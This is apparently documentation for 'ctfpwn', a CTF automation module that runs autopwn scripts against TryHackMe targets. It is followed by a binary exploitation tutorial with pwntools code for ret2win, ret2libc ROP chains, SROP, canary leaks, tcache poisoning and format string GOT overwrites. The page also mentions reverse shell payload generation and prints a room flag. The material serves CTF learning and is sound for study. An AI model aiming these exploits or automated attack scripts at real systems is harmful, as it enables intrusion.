ctfpwn.

Clones github.com/0xb0rn3/CTFs, lists all rooms sorted newest first, and runs standalone autopwn scripts against a target. Flags are auto-extracted from script output (THM{}, HTB{}, flag{} patterns) and the full run log is saved to ~/ZX01C/CTF/<room>/.

VANTA Module CTF TryHackMe HackTheBox Autopwn Python 3 v0.0.1
Category: CTF
Language: Python 3
Location: tools/ctf/ctfpwn/
Author: dezthejackal | 0xb0rn3
Version: v0.0.1
License: MIT
Beginner Startup
New to VANTA or ctfpwn? Start here.
What you need first
  • A CTF binary or challenge (download from TryHackMe, HackTheBox, pwn.college)
  • pwntools: pip install pwntools
  • gdb-pwndbg: yay -S pwndbg
Your first safe command
set binary ./chall
set operation analyze
run
Operations by difficulty
  • Easy: analyze, checksec, strings_dump
  • Medium: bof_detect, ret2libc, format_string
  • Advanced: rop_chain, heap_exploit, kernel_pwn
Key terms:
  • Buffer Overflow: writing more data than a buffer can hold, overwriting adjacent memory
  • ROP Chain: Return-Oriented Programming, chaining existing code gadgets to bypass DEP/NX
  • PIE: Position Independent Executable, code loads at a random address (ASLR for the binary)
  • checksec: tool that shows which security mitigations a binary has enabled

Overview

What ctfpwn does

ctfpwn is VANTA's CTF automation module. It clones the 0xb0rn3/CTFs repository, mirrors all rooms to ~/ZX01C/CTF/, and runs the standalone autopwn script for any room directly against a target IP. Flag patterns — THM{}, HTB{}, and flag{} — are extracted automatically from script output and printed inline.

Room state is tracked in ~/.vanta/ctfs_state.json so ctfpwn knows exactly which rooms appeared since your last pull. Every run writes a full log to ~/ZX01C/CTF/<room>/run_<timestamp>.log.

Sync
Repo Mirror
Clones github.com/0xb0rn3/CTFs to ~/.vanta/ctfs/ on first run, then pulls on every subsequent call.
Detection
Flag Extraction
Scans all script output for THM{}, HTB{}, and flag{} patterns and prints matches immediately.
State
New Room Tracking
Room state stored in ~/.vanta/ctfs_state.json. Rooms added since last pull are marked in list output.
Logs
Run Logs
Full stdout from every autopwn run saved to ~/ZX01C/CTF/<room>/run_<timestamp>.log for review.
Search
Full-Text Search
Search scans room names, writeup files, and exploit script source. Useful for finding rooms by technique, CVE, or tool name.
Filter
Platform Filter
Filter rooms by platform: THM, HTB, or ALL. Defaults to TryHackMe.

Quick Start

Running ctfpwn

Connect to your platform VPN before running any autopwn script. Then load ctfpwn and pull the latest rooms.

# Pull all rooms on first run
VANTA
vanta ❯ use ctfpwn
VANTA (ctfpwn) ❯ set operation pull
VANTA (ctfpwn) ❯ run none

# List all rooms sorted newest first
VANTA (ctfpwn) ❯ set operation list
VANTA (ctfpwn) ❯ run none

Run a specific room

VANTA (ctfpwn) ❯ set operation run
VANTA (ctfpwn) ❯ set ctf simplectf
VANTA (ctfpwn) ❯ run 10.10.85.42

Run latest room against a target

VANTA (ctfpwn) ❯ set operation latest
VANTA (ctfpwn) ❯ run 10.10.85.42
Note: Connect to the TryHackMe or HackTheBox VPN before running any autopwn script. Scripts reach out to the target IP directly and will fail or hang without an active VPN session.

Reference

Operations

The operation parameter controls what ctfpwn does when run is called.

list (default)
List all CTFs sorted newest first. Rooms added since the last pull are marked with a new indicator.
pull
Clone the repo on first use or pull updates. Mirrors all room files to ~/ZX01C/CTF/ and updates the state file.
latest
Show the newest CTF room. If a target IP is passed to run, executes that room's autopwn script immediately.
run
Run a specific room's autopwn script against a target IP. Room matched case-insensitively with partial name support.
info
Print the README or writeup for a room. Requires ctf parameter to identify the room.
search
Full-text search across room names, writeup files, and exploit scripts. Requires a query parameter.
new
List only the rooms added since the last pull, based on the state file.
shell
Start a reverse shell listener and generate CTF-ready payloads for all common shell types. Set lhost, lport, and payload_type. Uses the revshell module internally.
Note: The search operation scans room names, writeups, and exploit scripts. On large repos this can take a few seconds. Results include file paths so you know exactly where a match was found.

Reference

Parameters

Parameter | Type | Default | Description
operation | string | list | Operation to run: list, pull, latest, run, info, search, shell, or new.
ctf | string | (none) | Room name for run and info operations. Case-insensitive, partial match supported. E.g. simple matches simplectf.
platform | string | THM | Platform filter applied to list, new, and search. Values: THM, HTB, or ALL.
query | string | (none) | Search term for the search operation. Matched against room names, writeup text, and script source.
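The matching rule for the ctf parameter (case-insensitive, partial, first match wins) can be sketched in a few lines. This is an illustrative sketch only, not ctfpwn's actual code; the function name resolve_room is hypothetical.

```python
def resolve_room(query, rooms):
    """Return the first room whose name contains `query`, ignoring case.

    Hypothetical helper: mirrors the documented behaviour, not the real source.
    """
    needle = query.lower()
    for room in rooms:
        if needle in room.lower():
            return room
    return None


rooms = ["Biohazard", "AttacktiveDirectory", "simplectf", "rootmeCTF"]
print(resolve_room("simple", rooms))
```

Because the first match wins, a short query such as ctf resolves to whichever matching room is listed first, so a longer query is safer when room names overlap.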

How It Works

Sync and run workflow

Understanding the pull and run sequence helps when debugging connectivity or stale room state.

Sync workflow

01
Clone or pull
On first run, git clone https://github.com/0xb0rn3/CTFs ~/.vanta/ctfs/. On subsequent pulls, git pull inside the same directory fetches any new commits.
02
Mirror room files
Each room directory from the repo is copied to ~/ZX01C/CTF/<room_name>/. Existing files are overwritten with the latest version from the repo.
03
Update state file
Room list and pull timestamp written to ~/.vanta/ctfs_state.json. The previous state is compared to detect which rooms are new since the last pull.
04
Report new rooms
Rooms that appear in the current state but not the previous state are flagged as new. These show up in list, new, and the pull summary.

Run workflow

01
Resolve room
The ctf parameter is matched case-insensitively against room names in ~/.vanta/ctfs/. Partial matches are accepted — first match wins.
02
Locate autopwn script
ctfpwn looks for the room's standalone script inside the matched directory. Scripts accept the target IP as the first positional argument.
03
Execute and stream output
The script is executed with the target IP: python3 exploit.py <target_ip>. Output is streamed to the terminal in real time while being captured for log and flag extraction.
04
Extract flags and save log
All lines matching THM\{[^}]+\}, HTB\{[^}]+\}, or flag\{[^}]+\} are printed as extracted flags. The full run log is written to ~/ZX01C/CTF/<room>/run_<timestamp>.log.
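The flag extraction in step 04 can be approximated with a single regular expression built from the three patterns listed above. A minimal sketch, assuming flags are de-duplicated in order of appearance (the real module may behave differently); extract_flags is a hypothetical name.

```python
import re

# The three documented patterns combined into one alternation.
FLAG_RE = re.compile(r"(?:THM|HTB|flag)\{[^}]+\}")


def extract_flags(output):
    """Return unique flags in the order they first appear in `output`."""
    flags = []
    for match in FLAG_RE.findall(output):
        if match not in flags:
            flags.append(match)
    return flags


sample = "[*] user.txt: THM{abc}\nnoise\n[*] root: HTB{x_y}\nTHM{abc}\nflag{}\n"
print(extract_flags(sample))
```

Note that [^}]+ requires at least one character between the braces, so an empty flag{} is not reported.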

State file structure

The state file at ~/.vanta/ctfs_state.json records the room list and pull timestamp. The new operation diffs current vs previous state to find additions.

{
  "last_pull":  1746403200,
  "rooms": [
    "Biohazard",
    "AttacktiveDirectory",
    "simplectf",
    "rootmeCTF"
  ]
}
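The diff performed by the new operation amounts to a set difference between the previous and current room lists. A rough sketch under the assumption that both states use the structure shown above; new_rooms and the sample timestamps are illustrative.

```python
import json


def new_rooms(previous_state, current_state):
    """Rooms present in the current state but absent from the previous one."""
    known = set(previous_state.get("rooms", []))
    return [room for room in current_state.get("rooms", []) if room not in known]


previous = json.loads('{"last_pull": 1746316800, "rooms": ["simplectf", "rootmeCTF"]}')
current = json.loads(
    '{"last_pull": 1746403200, '
    '"rooms": ["Biohazard", "AttacktiveDirectory", "simplectf", "rootmeCTF"]}'
)
print(new_rooms(previous, current))
```

Keeping the result as a list (rather than a set) preserves the newest-first ordering of the room list.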

Room List

Available rooms

25 TryHackMe rooms, sorted newest first. HTB rooms are in progress.

TryHackMe (25 rooms)

# | Room | Platform
01 | Biohazard | THM
02 | AttacktiveDirectory | THM
03 | UltraTech | THM
04 | Blog | THM
05 | 0day | THM
06 | Dogcat | THM
07 | Ghizer | THM
08 | Relevant | THM
09 | Wgel | THM
10 | Wonderland | THM
11 | Cheese-CTF | THM
12 | Year of the pig | THM
13 | Rabbit_Store | THM
14 | Silver_Platter | THM
15 | crypto_failures | THM
16 | sticker_shop | THM
17 | chill-hack | THM
18 | W1seGuy | THM
19 | agent_sudo | THM
20 | bounty_hacker | THM
21 | Hidden_Deep_Into_My_Heart | THM
22 | VulnNet-Internal | THM
23 | pickle-rick | THM
24 | simplectf | THM
25 | rootmeCTF | THM

HackTheBox

Coming soon. Set platform HTB to filter for HTB rooms once available.

Usage

Examples

List all CTFs

vanta ❯ use ctfpwn
VANTA (ctfpwn) ❯ set operation list
VANTA (ctfpwn) ❯ run none

Pull and sync everything

VANTA (ctfpwn) ❯ set operation pull
VANTA (ctfpwn) ❯ run none

# Output
[+] Pulling 0xb0rn3/CTFs ...
[+] Mirrored 25 rooms to ~/ZX01C/CTF/
[+] 2 new rooms since last pull: Biohazard, AttacktiveDirectory

Run latest against a target

VANTA (ctfpwn) ❯ set operation latest
VANTA (ctfpwn) ❯ run 10.10.85.42

# Runs Biohazard autopwn against 10.10.85.42

Run a specific room

VANTA (ctfpwn) ❯ set operation run
VANTA (ctfpwn) ❯ set ctf simplectf
VANTA (ctfpwn) ❯ run 10.10.85.42

# Output
[+] Running simplectf against 10.10.85.42
[+] Flag found: THM{Mg1tsM@g1c}
[+] Log saved: ~/ZX01C/CTF/simplectf/run_1746403200.log

Search by technique

VANTA (ctfpwn) ❯ set operation search
VANTA (ctfpwn) ❯ set query ssti
VANTA (ctfpwn) ❯ run none

# Scans room names, writeups, and exploit scripts for "ssti"

See what is new since last pull

VANTA (ctfpwn) ❯ set operation new
VANTA (ctfpwn) ❯ run none

Read a room's writeup

VANTA (ctfpwn) ❯ set operation info
VANTA (ctfpwn) ❯ set ctf dogcat
VANTA (ctfpwn) ❯ run none

Filter by platform

VANTA (ctfpwn) ❯ set operation list
VANTA (ctfpwn) ❯ set platform ALL
VANTA (ctfpwn) ❯ run none

Dependencies

Required and optional tools

ctfpwn itself only needs Python 3 and git. Individual room scripts may require additional tools depending on the techniques they use.

Tool | Required | Used for
python3 | Yes | Running ctfpwn and autopwn scripts
git | Yes | Cloning and pulling the CTFs repo
nmap | Optional | Most room scripts use nmap for initial port scanning
gobuster | Optional | Web rooms that include directory or vhost brute-forcing
sshpass | Optional | Privesc scripts that automate SSH login with a found credential
hydra | Optional | Brute force rooms requiring credential spraying
nodejs | Optional | Rooms with JavaScript-based exploits

Install dependencies (required and optional)

# Debian / Ubuntu / Kali
sudo apt install python3 git nmap gobuster sshpass hydra nodejs

# Arch / CachyOS
sudo pacman -S python git nmap gobuster sshpass hydra nodejs

About

Author

dezthejackal | 0xb0rn3
CTF Player · VANTA Developer
CTF write-up author and tool builder. ctfpwn is part of the VANTA offensive security framework, bringing CTF automation into the same modular shell used for network recon, mobile pentesting, and C2 operations. Rooms cover TryHackMe and HackTheBox across web exploitation, privilege escalation, cryptography, and binary challenges.

Binary Exploitation Architecture

What is binary exploitation? Programs compiled from C/C++ run directly on the CPU as machine code. When a programmer makes a mistake — trusting user input for a size, forgetting a null terminator, using a freed pointer — an attacker can feed crafted input that corrupts memory and hijacks the program's execution. Binary exploitation is the art of turning memory corruption bugs into controlled code execution.

CPU registers (x86-64)

General purpose registers (64-bit names, 32-bit in parentheses):
  RAX (EAX) — return value, accumulator
  RBX (EBX) — base, callee-saved
  RCX (ECX) — counter, 4th arg (System V AMD64 ABI)
  RDX (EDX) — data, 3rd arg
  RSI (ESI) — source index, 2nd arg
  RDI (EDI) — destination index, 1st arg
  RBP (EBP) — frame pointer (base of current stack frame)
  RSP (ESP) — stack pointer (top of stack — grows DOWN)
  RIP (EIP) — instruction pointer (next instruction to execute)
  R8–R15     — additional argument/scratch registers

# System V AMD64 calling convention (Linux):
# First 6 args in: RDI, RSI, RDX, RCX, R8, R9
# Return value: RAX
# Stack must be 16-byte aligned before CALL

Stack frame layout

# When function foo() calls bar():
# CALL instruction: pushes RIP (return address) then jumps to bar

High addresses
┌─────────────────────┐  ← caller's frame
│  local vars (foo)   │
│  saved RBP          │  ← foo's frame pointer
│  return addr →foo   │  ← pushed by CALL instruction
├─────────────────────┤  ← bar's frame starts here
│  saved RBP          │  ← PUSH RBP (first instruction of bar)
│                     │  ← RBP now points here
│  local vars (bar)   │
│  [buffer[64]]       │  ← char buf[64] lives here
│                     │
└─────────────────────┘  ← RSP (top of stack)
Low addresses

# Stack grows DOWN: RSP decreases as you push/allocate

# GDB: examine stack
(gdb) x/20xg $rsp    # dump 20 qwords from RSP
(gdb) info frame      # show saved RIP, RBP of current frame

ELF binary format (Linux executables)

ELF Header (64 bytes):
  7F 45 4C 46       # Magic: "\x7fELF"
  02                # EI_CLASS = 2 (64-bit)
  01                # EI_DATA = 1 (little-endian)
  01                # EI_VERSION = 1
  00                # EI_OSABI = 0 (System V)
  [8 bytes: EI_ABIVERSION + 7 bytes padding]
  02 00             # e_type = ET_EXEC (executable) or 03=ET_DYN (PIE)
  3E 00             # e_machine = 0x3E = x86-64
  [entry point, phoff, shoff, flags, header size...]

Key ELF sections:
  .text    — executable code (r-x)
  .data    — initialised global variables (rw-)
  .bss     — uninitialised globals, zeroed at startup (rw-)
  .rodata  — read-only data: string literals (r--)
  .plt     — Procedure Linkage Table: stubs for libc functions
  .got.plt — Global Offset Table: resolved library addresses
  .dynamic — dynamic linking info (NEEDED libraries, etc.)

Binary mitigations (checksec output)

Mitigation | What it does | Bypass technique
NX / DEP | Stack + heap not executable (W^X) | ROP: reuse existing code gadgets
ASLR | Randomizes stack/heap/library base addresses | Leak a pointer, calculate offsets
PIE | Randomizes the binary's own base address | Leak binary address (format string, partial overwrite)
Stack Canary | Random value before saved RIP; checked before return | Leak canary (format string), brute force (32-bit)
RELRO (Full) | GOT made read-only after startup | Harder: need heap/BSS as write target instead
# ctfpwn checksec output:
{
  "nx": true,       # NX enabled — no shellcode on stack
  "pie": true,      # PIE — binary randomized
  "canary": true,   # Stack canary present
  "relro": "full",  # Full RELRO — GOT is read-only
  "arch": "amd64"
}

Buffer Overflow: From Zero to Shell

What is a buffer overflow? A buffer is a region of memory used to store data temporarily. When a program copies input into a fixed-size buffer without checking the input length, you can write past the end of the buffer into adjacent memory — including the saved return address on the stack. By controlling what you write there you control where the program jumps when the function returns.

Vulnerable C code

#include <stdio.h>
#include <string.h>

void vuln() {
    char buf[64];         // 64 bytes on stack
    gets(buf);            // reads until newline — NO LENGTH CHECK
    printf("Hello, %s\n", buf);
}

int main() {
    vuln();
    return 0;
}

# Stack layout in vuln():
# [buf: 64 bytes][saved RBP: 8 bytes][saved RIP: 8 bytes]
# Total to saved RIP: 64 + 8 = 72 bytes
# Send 72 bytes of padding + 8-byte target address → hijack RIP
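The arithmetic above (64-byte buffer + 8-byte saved RBP, then an 8-byte little-endian address) can be checked without pwntools. A minimal sketch, assuming no compiler padding between buf and the saved RBP; the address 0x401234 is a placeholder and build_overflow is a hypothetical helper.

```python
import struct


def build_overflow(buf_size, target_addr, saved_rbp_size=8):
    """Padding up to the saved return address, then the new return address."""
    padding = b"A" * (buf_size + saved_rbp_size)
    # "<Q" packs an unsigned 64-bit integer in little-endian byte order.
    return padding + struct.pack("<Q", target_addr)


payload = build_overflow(64, 0x401234)  # 0x401234 is a placeholder address
print(len(payload), payload[72:].hex())
```

Real binaries often insert alignment padding, so the offset should still be confirmed with a debugger or a cyclic pattern.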

Finding the offset (ctfpwn bof_detect)

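# Method 1: cyclic pattern (pwntools)
from pwn import *
io = process("./vuln")
io.sendline(cyclic(200, n=8))   # 8-byte subsequences to match 64-bit registers
io.wait()                       # wait for the process to crash
# Read the crash from the core dump (needs core dumps enabled: ulimit -c unlimited)
core = io.corefile
offset = cyclic_find(core.fault_addr, n=8)
print(f"Offset to RIP: {offset}")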

# Method 2: manual binary search
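# Send 80 A's, 88 A's, 96 A's and watch for the saved return address becoming 0x4141414141414141
# (on x86-64 the crash happens at the RET itself, so inspect the top of the stack, not RIP)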
# Method 3: ctfpwn bof_detect runs automated fuzzing loop

ret2win exploit (no ASLR, no PIE)

from pwn import *

# Target binary has a win() function at 0x401234 that calls system("/bin/sh")
elf = ELF("./vuln")
win_addr = elf.sym["win"]   # or hard-code the integer: 0x401234

offset = 72  # bytes until saved RIP

payload  = b"A" * offset    # padding to reach saved RIP
payload += p64(win_addr)    # overwrite RIP with win()'s address

io = process("./vuln")
io.sendline(payload)
io.interactive()             # get the shell

Stack canary bypass via format string leak

# If binary has both a format string bug AND a buffer overflow:
# Step 1: leak the canary with the format string bug
io.sendline(b"%11$p")   # print 11th stack argument (adjust index for binary)
leaked = int(io.recvline(), 16)
canary = leaked
print(f"Canary: {hex(canary)}")

# Step 2: construct overflow with correct canary in place
payload  = b"A" * 64           # fill buffer
payload += p64(canary)         # canary MUST match exactly
payload += p64(0)              # saved RBP (can be anything)
payload += p64(win_addr)       # overwrite RIP

Return-Oriented Programming (ROP)

NX/DEP prevents executing shellcode on the stack. But you can still control execution by chaining gadgets — small sequences of existing code that end with a RET instruction. Each gadget pops the next return address off the stack and jumps there, so your stack payload is a chain of gadget addresses that collectively do something useful.

What is a gadget?

# A gadget is any instruction sequence ending in RET found in the binary or libc
# Examples:
# 0x401234: pop rdi ; ret     ← set RDI (1st argument) to any value
# 0x401238: pop rsi ; ret     ← set RSI (2nd argument)
# 0x401240: pop rdx ; ret     ← set RDX (3rd argument)
# 0x40129a: ret               ← stack alignment gadget (16-byte align for libc)

# Find gadgets:
ROPgadget --binary ./vuln --only "pop|ret"
ropper -f ./vuln
# ctfpwn rop_chain generates candidates automatically
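What a gadget finder does at its simplest is scan executable bytes for known instruction encodings. The sketch below searches a byte string for three single-byte pop instructions followed by ret (0xc3); the sample bytes and base address are made up, and real tools also disassemble backwards from every ret to find longer gadgets.

```python
# x86-64 encodings: pop rdi = 5f, pop rsi = 5e, pop rdx = 5a, ret = c3
GADGETS = {
    "pop rdi ; ret": b"\x5f\xc3",
    "pop rsi ; ret": b"\x5e\xc3",
    "pop rdx ; ret": b"\x5a\xc3",
}


def find_gadgets(code, base_addr):
    """Map each gadget name to the addresses where its encoding occurs."""
    found = {}
    for name, encoding in GADGETS.items():
        addrs = []
        start = code.find(encoding)
        while start != -1:
            addrs.append(base_addr + start)
            start = code.find(encoding, start + 1)
        found[name] = addrs
    return found


# Hypothetical .text bytes loaded at 0x401000.
code = b"\x90\x90\x5f\xc3\x48\x89\xe5\x5e\xc3\x5f\xc3"
for name, addrs in find_gadgets(code, 0x401000).items():
    print(name, [hex(a) for a in addrs])
```

Because x86 instructions are variable-length, gadgets can start in the middle of an intended instruction, which is why a raw byte search finds more than a linear disassembly would.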

ret2libc chain (calling system("/bin/sh"))

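from pwn import *

elf  = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")   # must match the target's libc
io   = process(elf.path)
offset = 72   # bytes until saved RIP (from the overflow section)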

# Step 1: leak a libc address to defeat ASLR
# Use a puts(got["puts"]) gadget:
rop = ROP(elf)
rop.raw(rop.find_gadget(["pop rdi", "ret"])[0])  # pop rdi ; ret
rop.raw(elf.got["puts"])                          # rdi = GOT address of puts
rop.raw(elf.plt["puts"])                          # call puts(GOT[puts])
rop.raw(elf.sym["main"])                          # return to main for second stage

payload = flat({offset: rop.chain()})
io.sendline(payload)

# Parse leaked address
leaked_puts = u64(io.recvline()[:6].ljust(8, b'\x00'))
libc.address = leaked_puts - libc.sym["puts"]    # calculate libc base

# Step 2: call system("/bin/sh") with known libc base
binsh  = next(libc.search(b"/bin/sh\x00"))
system = libc.sym["system"]

rop2 = ROP([elf, libc])
rop2.raw(rop2.ret.address)                        # alignment gadget
rop2.raw(rop2.find_gadget(["pop rdi", "ret"])[0])
rop2.raw(binsh)
rop2.raw(system)

payload2 = flat({offset: rop2.chain()})
io.sendline(payload2)
io.interactive()
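The leak-parsing step is plain arithmetic: the six leaked bytes are a little-endian pointer, and subtracting the symbol's offset inside libc gives the base. A standalone sketch; the leaked bytes and the 0x80e50 offset are invented for illustration, and in practice the offset comes from the target's own libc.

```python
def parse_leak(raw):
    """Turn the first 6 bytes printed by puts() into a 64-bit address."""
    return int.from_bytes(raw[:6].ljust(8, b"\x00"), "little")


def libc_base(leaked_addr, symbol_offset):
    """Base = leaked address - symbol offset; a valid base is page-aligned."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong libc or bad leak")
    return base


raw = b"\x50\x0e\xa8\x34\x12\x7f\n"   # hypothetical puts() output
leaked_puts = parse_leak(raw)
base = libc_base(leaked_puts, 0x80E50)  # 0x80e50: assumed offset of puts
print(hex(leaked_puts), hex(base))
```

The page-alignment check is a cheap sanity test: if the computed base does not end in 000, the libc version or the parsed leak is wrong.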

SROP (Sigreturn-Oriented Programming)

# When gadgets are scarce (tiny binary, stripped), use SROP:
# sigreturn syscall (15) restores ALL registers from a sigframe on the stack
# You control the entire CPU state in one gadget

from pwn import *
context.arch = "amd64"

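# Build a fake sigframe that sets RAX=59 (execve), RDI="/bin/sh", RIP=syscall gadget
# binsh_addr, syscall_addr, pop_rax and offset are placeholders you must find for your target
frame = SigreturnFrame()
frame.rax = 0x3b          # sys_execve
frame.rdi = binsh_addr    # "/bin/sh"
frame.rsi = 0             # argv = NULL
frame.rdx = 0             # envp = NULL
frame.rip = syscall_addr  # syscall ; ret gadget

# Chain: RAX=15 (rt_sigreturn) → syscall → kernel restores registers from the frame that follows
payload = flat({offset: [pop_rax, 15, syscall_addr, bytes(frame)]})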

Heap Exploitation

The heap is a dynamically allocated memory region managed by ptmalloc2 (glibc's allocator). When a bug lets you read or write out of bounds on a heap chunk, or use memory after it's been freed, you can corrupt allocator metadata and redirect the next malloc() call to return an arbitrary address — giving you a write primitive anywhere in memory.

malloc chunk layout

# Every malloc(n) allocation is a "chunk" with a header:
# (on 64-bit — header is 16 bytes)

Allocated chunk:
  [prev_size: 8B] — only used when prev chunk is FREE
  [size:      8B] — includes flags in low 3 bits
                    bit 0 (P) = previous chunk in use
                    bit 1 (M) = mmapped
                    bit 2 (A) = non-main arena
  [user data: n bytes, padded to 16-byte alignment]

Free chunk (returned to allocator):
  [prev_size: 8B]
  [size:      8B]  (P bit = 0)
  [fd:        8B]  — forward pointer (next free chunk)
  [bk:        8B]  — backward pointer (prev free chunk)
  [... rest of user data space ...]

# The fd/bk pointers in a free chunk are INSIDE the user data region
# → corrupting the user data of a freed chunk corrupts the free list
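The relationship between a malloc(n) request and the resulting chunk size, and the flag bits packed into the size field, can be sketched as follows. The constants are the usual 64-bit glibc values (SIZE_SZ = 8, 16-byte alignment, 32-byte minimum chunk); the helper names are illustrative.

```python
SIZE_SZ = 8              # size of the size field on 64-bit
MALLOC_ALIGN_MASK = 15   # chunks are 16-byte aligned
MINSIZE = 32             # smallest possible chunk


def chunk_size(request):
    """Chunk size glibc uses for malloc(request) on 64-bit."""
    size = (request + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


def decode_size_field(raw):
    """Split a raw size field into the real size and its three flag bits."""
    return {
        "size": raw & ~0x7,
        "prev_inuse": bool(raw & 0x1),      # P
        "mmapped": bool(raw & 0x2),         # M
        "non_main_arena": bool(raw & 0x4),  # A
    }


for request in (24, 25, 0x408):
    print(request, hex(chunk_size(request)))
print(decode_size_field(0x91))
```

A request of 24 bytes fits in a 0x20 chunk because the allocated chunk may reuse the next chunk's prev_size field, which is why only 8 bytes of header are added before rounding.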

tcache (glibc 2.26+)

# tcache = per-thread singly-linked free list, one per size class (up to 0x408)
# Each size has a "bin" holding up to 7 freed chunks
# tcache entry: [next: 8B][key: 8B][user data...]
# "next" points to the next free chunk in the bin

# tcache poisoning attack:
# 1. Allocate two same-size chunks: A, B
# 2. Free B, then A (A is now tcache head: A→B→NULL)
# 3. Overflow/UAF to corrupt A's "next" pointer → set to target address
# 4. malloc() returns A (pops from tcache)
# 5. malloc() again → tcache head is now target → returns target address!
# 6. Write to that malloc() return value → arbitrary write

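# Example with ctfpwn heap_exploit:
# Corrupt tcache next → point to __free_hook or __malloc_hook (glibc < 2.34; the hooks were removed in 2.34)
# Write system address there → next free(ptr_to_binsh) calls system("/bin/sh")
# Note: glibc 2.32+ applies safe-linking, so "next" is stored as (address_of_next >> 12) XOR target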
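The six poisoning steps can be replayed on a toy model of a single tcache bin. This is a deliberately simplified simulation (a Python dict stands in for memory, there is no safe-linking, no count field, and no key check), and the addresses are made up.

```python
class ToyTcacheBin:
    """Singly-linked LIFO free list, like one tcache bin without mitigations."""

    def __init__(self):
        self.head = None
        self.next_ptr = {}   # chunk address -> stored "next" pointer

    def free(self, addr):
        self.next_ptr[addr] = self.head   # new entry points at the old head
        self.head = addr

    def malloc(self):
        addr = self.head
        self.head = self.next_ptr.get(addr)   # follow "next" blindly
        return addr


A, B, TARGET = 0x405010, 0x405030, 0x404040   # hypothetical addresses

bin_ = ToyTcacheBin()
bin_.free(B)
bin_.free(A)                 # list is now A -> B -> NULL
bin_.next_ptr[A] = TARGET    # overflow/UAF corrupts A's next pointer
first = bin_.malloc()        # returns A
second = bin_.malloc()       # returns TARGET: attacker-chosen address
print(hex(first), hex(second))
```

The allocator never checks that "next" points at a real chunk, which is the entire attack; newer glibc versions make the pointer harder to forge but keep the same list structure.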

Use-After-Free (UAF)

# UAF: use a pointer after the memory it pointed to was freed
# If the freed chunk is re-allocated (to a different object), the stale pointer
# now points INTO the new object's data — type confusion attack

struct Obj {
    void (*fn)();   // function pointer at offset 0
    char  data[56]; // data buffer
};

// UAF flow:
struct Obj *a = malloc(sizeof(struct Obj));  // allocate
a->fn = legit_function;
free(a);                        // freed — chunk returned to tcache
char *b = malloc(64);           // same size → same chunk returned
memcpy(b, attacker_input, 64); // fill with attacker data
a->fn();  // UAF: a points to freed/reallocated chunk
          // a->fn is now attacker_input[0..7] → arbitrary function call

Format String Exploitation

What is a format string bug? The C function printf(fmt, ...) treats the format string as instructions: %s reads a string pointer from the stack, %d reads an integer, %x reads a hex value. If user input is passed directly as the format string — printf(user_input) instead of printf("%s", user_input) — the attacker controls those instructions.

Reading arbitrary memory

# printf reads arguments off the stack in order.
# If you supply more format specifiers than arguments, it reads whatever's there.
# %N$p reads the Nth argument (stack word) as a pointer.

# Send: "%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p"
# Output: 0x7fff... (stack addresses), 0x555... (binary addresses), etc.

# Identify canary (usually 0x????..??00 — last byte always 0x00):
# → use it to bypass stack canary in accompanying buffer overflow

# Identify saved RIP → compute PIE/libc offsets → defeat ASLR

# ctfpwn format_string operation:
# Sends probes "%N$p" for N=1..50, parses output, identifies canary + libc base
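Parsing the output of a %p probe and flagging likely canaries is mostly string handling. The sketch below assumes the probe values are separated by dots and uses a simple heuristic (low byte 0x00 and non-zero top 16 bits, which user-space pointers never have); the sample leak line is fabricated for illustration and this is not the module's actual logic.

```python
def parse_pointer_leak(line, sep="."):
    """Convert '0x7ffc....(nil).0x55...' into a list of integers."""
    values = []
    for token in line.strip().split(sep):
        values.append(0 if token == "(nil)" else int(token, 16))
    return values


def canary_candidates(values):
    """Return (index, value) pairs that look like a 64-bit stack canary.

    Index is 1-based so it can be used directly as N in %N$p.
    """
    hits = []
    for index, value in enumerate(values, start=1):
        low_byte_zero = (value & 0xFF) == 0
        not_a_user_pointer = (value >> 48) != 0
        if low_byte_zero and not_a_user_pointer:
            hits.append((index, value))
    return hits


leak = "0x7ffc1a2b3c40.(nil).0x55d0c0de1234.0x3a1f9c27d84be500.0x7ffc1a2b3d50"
values = parse_pointer_leak(leak)
print([(i, hex(v)) for i, v in canary_candidates(values)])
```

The heuristic can miss a canary whose top two bytes happen to be zero, so it is best confirmed by checking that the value stays constant across probes within one process.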

Writing memory with %n

# %n writes the NUMBER OF BYTES PRINTED SO FAR to the address in the next arg
# This is a write primitive — you can write any 4-byte value anywhere writable

# Write 0x4141 (16705) to address target_addr:
# Step 1: Pad output to 16705 bytes using %16705c (print 16705-wide char)
# Step 2: %N$n — write count to Nth stack argument (which points to target)

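from pwn import *
elf = ELF("./vuln")
io = process(elf.path)

target   = elf.got["puts"]   # overwrite GOT entry for puts → redirect to win()
win_addr = elf.sym["win"]

# %8$n writes to the address at stack arg 8
# Assumes our input starts at stack arg 6 (verify with %N$p probes); the format text is
# padded to 16 bytes (2 stack words) so the address that follows lands at arg 8
fmt  = f"%{win_addr}c%8$n".encode()  # print win_addr characters, then write the count
fmt  = fmt.ljust(16, b"A")            # pad to exactly two 8-byte stack words
fmt += p64(target)                    # address to write to at stack pos 8

io.sendline(fmt)
io.interactive()  # next call to puts() → jumps to win()
# pwntools can also build this for you: fmtstr_payload(6, {target: win_addr})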
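Printing millions of characters for one %n is slow, so real payloads usually write one byte at a time with %hhn. The padding needed before each write follows from the running character count modulo 256, as this small sketch shows; hhn_paddings is a hypothetical helper and 0x401234 is a placeholder value.

```python
def hhn_paddings(value, num_bytes):
    """Characters to print before each %hhn so the low byte of the running
    count equals the next byte of `value` (least significant byte first)."""
    pads = []
    written = 0
    for i in range(num_bytes):
        wanted = (value >> (8 * i)) & 0xFF
        pad = (wanted - written) % 256   # wrap around instead of going negative
        pads.append(pad)
        written += pad
    return pads


pads = hhn_paddings(0x401234, 3)
print(pads)
```

Each padding is at most 255 characters, so writing an 8-byte pointer costs at most about 2 KB of output instead of millions of characters. A padding of 0 means the %Nc directive should be omitted for that byte.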

Customization & Extension

Adding a custom exploit generator

# tools/ctf/ctfpwn.py — extend with custom exploit template generator

EXPLOIT_TEMPLATES = {
    "ret2win": """from pwn import *
elf = ELF('{binary}')
io = process(elf.path)
win = elf.sym['{win_fn}']
payload = b'A' * {offset} + p64(win)
io.sendline(payload)
io.interactive()
""",
    "ret2libc": """from pwn import *
elf  = ELF('{binary}')
libc = ELF('{libc}')
rop  = ROP(elf)
# Stage 1: leak puts address...
""",
}

def generate_exploit(template_name, **kwargs):
    template = EXPLOIT_TEMPLATES.get(template_name)
    if not template:
